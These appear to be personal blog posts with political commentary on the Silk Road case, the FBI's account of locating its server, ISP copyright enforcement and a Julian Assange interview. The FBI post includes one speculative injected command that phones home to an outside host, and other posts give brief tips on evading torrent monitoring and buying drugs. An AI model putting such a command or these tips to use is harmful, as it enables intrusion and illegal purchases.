No, a myriad of new silk roads will not rise up to replace the old one

The State’s war on Dark Net marketplaces will result in previously trusted marketplaces being replaced by riskier and less trustworthy ones. Honest people operating on a reasonable risk/reward calculation will increasingly abstain from using them. The likely consequence is that the confidence level of DarkNet c-to-b transactions will begin to resemble that of traditional c-to-b transactions, with the additional negative repercussions of being more riskier to the buyer than the traditional c-to-b model.

By now, I’m sure anyone reading this post is aware of the sentence handed down to Ross Ulbricht(aka,”Dread Pirate Roberts”). The purpose of this post is not to extend a commentary on the barbaric character of the sentence.1 That will be for another time. Instead, I want to counter the conventional postscript that concludes virtually every postmortem of the drug war.

“Just another example of an irrational,failed drug war. Take one down, fifteen will rise up to take its place…”

Nope. Not the case. Particularly, in this instance.

First, we should accurately report the full sentence Ulbricht received. It was life imprisonment and a 185 million dollar fine. The State rolled up money laundering charges in the conviction, in no small part because the United States government now “recognizes” bitcoin as a legitimate medium of exchange.2The financial penalty of bitcoin money laundering appears to be the total transactional value that can be pieced together through a forensic analysis of the public blockchain.

Secondly, public court documents and testimony regarding the fed purchases of product from the original silk road marketplace indicate an abnormal level of reliability in a c-to-b(consumer to business, or, if you prefer, user to dealer) drug transaction. Documents indicate you had about a 95% level of confidence that you were actually getting what you thought you were buying. Trust me, that level of confidence is not the norm in traditional c-to-b drug transactions. That’s the real story. The “reduction in violence” argument is not. Frankly, if you made the argument, it is a good indication that your only knowledge of the drug trade comes from watching tv/movies and reading state media sources.

Unfortunately, the effect of barbaric sentencing and draconian money laundering penalties will serve to introduce quite a bit of fraud into Dark Net drug marketplaces. Yes, knock one down, and perhaps fifteen will rise up to take its place. But the level of confidence of a c-to-b transaction confidence will begin to approach the traditional level and indeed may even fall below what you can expect on “the street.” In addition, the confidence level of “dealing with a narc,” on either side of the ledger(consumer or supplier), begins to exceed what you can expect “on the street.” So while there will be replacements, they won’t be exactly the same version as the previous ones.

Frankly, anyone who engages in a repeated pattern of buying or selling on Dark Net sites can only expect to be busted. You may as well just send out an email to the pigs for all intent and purposes. This is opposed to the traditional model where only the dealer following a repeated pattern faces a probable certainty of being prosecuted.

Bitcoin has its uses, but in terms of buying contraband, you are better off sticking to the old-fashioned human p2p network of your reasonably trusted inner/outer circle.

Unfortunately, that conclusion doesn’t exactly make for a “failed war on drugs,” now does it?

1 I’ve read many characterizations that described it as “tragic.” Its not tragic. Its barbaric.

2 Another demonstration why the dipshit “libertarians” at George Mason University campaigning for a “bitcoin regulatory regime” are mortal enemies of libertarianism. The argument that a “regulatory regime” carves out a “legitimate space” in a space that would otherwise be treated wholly as “criminal” actually introduces a far more punitive criminal sanction regime.”Legitimacy” allows the feds to wield the weapon of “money laundering.” And the blockchain is not anonymous. It is only pseudo-anonymous. The crime of operating a website can now carry the financial penalty of any applicable transactional value of the duly recorded transactions in the public blockchain.

Advertisements

The FBI Pwns You

A few hours ago Wired published details of the FBI’s rebuttal to the previously filed Ross Ulbricht defense motion that proffered the State’s case necessarily rested on evidence obtained from illegal searches(read: NSA dragnetting). The gist:

In the latest filing, however, former FBI agent Christopher Tarbell counters Ulbricht’s defense by describing just how he and another FBI agent located the Silk Road server in June of last year without any sophisticated intrusion: Instead, he says, they found a misconfiguration in an element of the Silk Road login page, which revealed its internet protocol (IP) address and thus its physical location.

As they typed “miscellaneous” strings of characters into the login page’s entry fields, Tarbell writes that they noticed an IP address associated with some data returned by the site didn’t match any known Tor “nodes,” the computers that bounce information through Tor’s anonymity network to obscure its true source. And when they entered that IP address directly into a browser, the Silk Road’s CAPTCHA prompt appeared, the garbled-letter image designed to prevent spam bots from entering the site.

The actual technical claim: Arbitrary HTTP Posts to the login form action leaked the Server’s Internet Protocol Address in the Response Headers and/or data payload.

Probability of said claim: Assuming Ulbricht(and the chain of ownership that preceded him) not to be idiots of the first order, ~0. The only likely “misconfiguration” would be the typical default configuration, which is to “leak” the web server and OS type/version in the response headers.

If we assume the FBI letter to be a half-truth, which frankly is not necessarily a reasonable presumption to make(as opposed to, say, the outright lie), we can ascertain a more accurate technical translation:

We sent a malicious string in the request body of a login submission to inject an executable code payload, $ curl http://laundry.forensics.fbi.gov, which essentially allowed to us to perform a remote drive-by phone home on the target.

Now, if we assume the half-truthiness of the FBI in this matter, we can thusly deduce a methodology of counter-attack by US intel organs against network obfuscation techniques–namely directly attacking the target at the application layer. In other words, the use of buffer overflow exploits(maybe zero-day or not) on the target itself to perform drive-by phone homes, or in a more sophisticated attack, to install a wiretap implementation.

Going forward, one has to assume that the use of “cyber-hacking” as means to facilitate a court-approved wiretap will be deemed legal in much the same way breaking into your property to install the old-fashioned wiretaps was deemed legally proper. Of course, I would be remiss not to point out that the legal sanctification of State hacking by organs of the justice department provides a very convenient laundromat for laundering the legality of any data collected by the 3-hop graphical dragnet(read: NSA).

Finally, it should be noted that it’s not surprising the State would eventually seize on this vector of attack. Since 1988(the infamous morris worm), it is been well-known that the weakness of the internet was not in the layered protocol design itself but in the client-server software implementation of the protocol standards. In particular, the c and c++ languages are susceptible to memory violations in string operations against arbitrary data length, resulting in access violations that can produce malicious results if the violating data is carefully formatted to do exactly that. In a sense, it is enough a problem that it could have killed the internet from the start if not for a sort of spontaneous, heuristic security best practices regime that arose that limited the problem of rogue actors to a tolerable one.

But if the heuristic law saved the internet, it is the “rule of law” that will surely kill it(in terms of being a utopian instrument). For it is the latter which turns software vulnerabilities into a primary means of both wiretapping targets and laundering graphical dragnets, reminding us, once again, that the State is indeed its own agency and its preservation best executed by a type of competitive agency of invasion of the body snatchers.

The Copyright Alert System Now Being Rolled Out at Major ISPs

In the next two months, AT&T, Time Warner, Verizon and Comcast will implement the The Copyright Alert System program developed by The Center for Copyright Information. Of course, The Center for Copyright Information is a RIAA and MPPA front. The monitoring system that will be used will rely on the MarkMonitor service that has been in place for a numbers of years now. The “monitors” will be The Center for Copyright Information, i.e., RIAA and MPAA. Once again, these entities have been monitoring bitTorrent traffic for years. Indeed, a recently presented Security Research Paper concludes that you can expect to be tracked within 3 hours of firing up a torrent client.

The primary change is that in lieu of direct legal action(which can be frictional), the RIAA/MPAA, using the aforementioned ISPs as agents, can now engage in a relatively frictionless enforcement operation. And this is where the data analytics begin to kick in. Large-scale users will still be subject to the same modis operandi legal action but the voluminous data that has been collected over the years by the likes of MarkMonitor will now be used as a queryable data repository against which the new data will be used–according to whatever algorithm employed–to trigger the Copyright Alert Notifications to end users via that user’s ISP(serving an agency role of a Sheriff, more or less).

Evasion tactics? Well forget about things like Tor. Tor works over the tcp protocol(and can’t handle the load of p2p file sharing to begin with). bitTorrent these days works over udp. Sophisticated encryption techniques like mse/pe to me are more about thwarting ISP throttling, but in this case it is not the ISPs who are the monitoring agent. The best evasion technique is to use a udp proxy. But I imagine that a reliable service with tolerable speed is going to cost money which begs the question a bit of why not simply spend the money on a paid download music service. That was basically my decision around 6 years ago when the opportunity costs of evasion(when the monitoring really began to pick up) well exceeded the monthly subscription cost of a paid service.

Of course, the Copyright Alert System is just harbinger of things to come. These types of arrangements up and down the IT stack will increase by orders of magnitude under the formal adoption of whatever “cybersecurity act” that eventually passes(once again, because the basic top-level rules will be enacted via fiat, i.e, executive decision, the subsequent proposal and adoption of a legislative act is an absolute certainty). And this, of course, just exposes the silliness of the “network neutrality debate” because “network traffic” should always be understood to mean “authorized network traffic.” The arbitration between “authorized” and “unauthorized” traffic will be subject to the most relentless data analytics imaginable.

I will also offer a brief comment on unjustified triumphalism that thinks these issues can be magically skirted around. This belief is based on a fundamental mischaracterization of the internet as a horizontal, decentralized type of network. But it is not that. Rather, the internet is a type of scale-free, small network that follows a power law distribution. The network properties of scale-free invariance is much a product of quite a bit of centralized coordination. Simply, it is a mistake to think that technology alone can overcome the problem of political economy. Instead a necessary condition to be able to “route around the damage” is jurisdictional differentiation in political economy. I’ve been harping this point for a couple of years in my posts about Wikileaks. If the jurisdictional differentiation melts away then feel free to proceed straight to the outright pessimism of Evgeny Morozov and Richard Stallman who have given up on the anarchic promise of the internet. The alternative is a platform that turns out to be very well suited for tight control by Corporation and State. The evidence for this latter pessimism is the degree of rent-seeking in data analytics this little platform of ours affords(which makes the actions of State agency very much “rational” and hardly stupid in this space). The game is up when the cyber-security and “data czars” come rolling down the pike.

Finally, The Copyright Alert System is once again immediate evidence of a “Commercialist” anomaly with regard to political economic agency. Methodological individualism is hard pressed to explain ISPs acting as a Sheriff Agency (on behalf of the RIAA/MPAA) against their own customers. The model of The Firm, however, explains it quite well.

Julian Assange Interview at Antiwar Radio

I haven’t seen this promoted in the libertarian blogosphere: Julian Assange’s recent interview at Antiwar Radio. It actually follows an interview with Daniel Ellsberg, who is a fairly frequent guest.

Up to now, Assange has been a fairly cryptic regarding his political views; but that is starting to change. Assange, in his public role, has subtly shifted from enigmatic hacker to activist and advocate. It is obvious now that he holds strong antiwar views. In addition to the obvious crypto-libertarian sentiment that frames the WikiLeaks mission statement, it’s probably safe to conjecture that Assange holds more general anarchist views. WikiLeaks has begun to bill itself as a global but stateless news media organization that employs an infrastructural redundancy so that no government can shut it down. Suffice to say, the United States is not part of this network infrastructure. It looks to be primarily spread out among various European jurisdictions that have fairly robust privacy laws. In this sense, the rise of the Pirate Party in Sweden, which at one time was viewed as nothing more than a novel oddity, begins to take on real significance.

In the antiwar radio interview, Assange confirms that Wikileaks does have video of the 2009 Granai airstrike, which killed a number of Afghan civilians, and will release it upon completion of the complex task of editing it in conjunction with the apparently large number of field reports that they also posses that document the operation.

Assange further gives some clarification about the recent stories that hit press that rumored he was concerned about being the target of CIA black bag operation. Assange says he was never worried about the CIA being after him. However, he was contacted by Seymour Hersh and other non-journalistic sources in the US government who were concerned about the private rhetoric being expressed by some within the government. Emmanuel Goldstein, editor of 2600(the famous hacker mag) which sponsors the Hope hacker conference that Assange was scheduled to speak at, has publicly stated that the Feds were waiting for Assange if he had shown up.

Assange indicates that the private rhetoric within the government, which I gather to mean the private sentiment being expressed within the intelligence agencies, has cooled down. However, the rhetoric of the politicians hasn’t cooled down, particularly in the congress. I’ve heard idiots, from both the Democratic and Republican side, babble about how he should be tried for treason. Apparently the crime of treason against the United States is no longer tied to citizenship. I’m sure some of those fucks would love to pass that law, but I imagine they probably just get off by hearing the word said out loud. In any event, don’t expect Julian Assange to be setting foot in the “land of the free” anytime soon.